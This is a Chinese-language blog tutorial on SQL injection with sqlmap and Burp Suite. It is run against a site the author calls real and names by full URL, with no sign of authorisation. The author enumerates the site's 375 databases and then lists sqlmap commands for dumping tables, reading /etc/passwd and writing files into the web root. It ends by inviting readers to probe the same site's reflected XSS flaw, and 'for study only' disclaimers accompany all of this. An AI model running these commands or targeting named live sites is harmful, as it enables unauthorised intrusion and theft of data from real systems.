实战！！！使用sqlmap进行sql注入

前言

进入正题前！！！！！禁止破坏！！！！插播广告！！！（物色天命主角，有意者请联系作者，作者24小时工作）

使用工具： 

• 1.sqlmap
• 2.burpsuite

目标：

https://bz.u2006.com/HYX10764/mater.php?id=5

ps–  ！！！真实站点，请勿搞破坏如有不然，本人概不负责。仅供学习交流！！！

使用sqlmap前明确目标。使用前，手工注入测试，测试感觉有注入点直接上工具。

使用指令： 

python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5

这里提示我们无法建立ssl连接，ssl具体是什么咱就不过谈论。无法建立连接，我采用的办法是通过走burpsuite的代理来解决，当然也还有其他办法咱不过谈论！！

接着我们使用参数–force-ssl这里是告诉我们的sqlmap这是htpps服务，然后在使用–proxy指定代理

全部指令如下：

python sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080

 ！！注意这里的地址和端口要和burpsuite一样。

如图:

中途要是询问y/n直接一路y就好了懒一点的话可以再指令后面加上–batch参数，表示一切默认执行。第一次扫描时间比较长请耐心等待

如出现如图：

表示注入方式有三种，咱就一般也不管。反正有就行了，有注入点，那就好办了。

直接输入指令： 

sqlmap.py -u https://bz.u2006.com/HYX10764/mater.php?id=5 --force-ssl --proxy http://127.0.0.1:8080 --dbs 查看所有库名

这里显示库有375个，至此咱就结束了爆出库名就行，仅做研究！！！一切违法行为与本人无关！！！

我给兄弟们总结了一下常用参数:

• -purge清楚缓存重新跑
• sqlmap -u <目标URL> –banner 查看数据库版本
• sqlmap -u <目标URL> –dbs 查看可以使用的数据库名
• sqlmap -u <目标URL> –current-user 查看当前用户
• sqlmap -u <目标URL> –current-db 获取当前数据库名称
• sqlmap -u <目标URL> –banner 查看数据版本
• sqlmap -u <目标URL> –tables -D <数据库名称> 获取指定数据库下的表
• sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> 获取表中的数据
• sqlmap -u <目标URL> –dump -D <数据库名称> -T <表名> -o <输出文件名> 下载表里面的内容到指定位置
• sqlmap -u <目标URL> –columns -D <数据库名称> -T <表名> 获取指定数据库下面的表的字段
• sqlmap -u <目标URL> –file-read “/etc/passwd” 查看网站目录文件
  sqlmap -u <目标URL> –file-write /test/test.txt –file-dest /var/www/html/1.txt写入网站目录文件

！！！！禁止破坏！！！！

后记练手小项目

此上网站存在xss反射型漏洞，有兴趣自行研究，禁止破坏！！！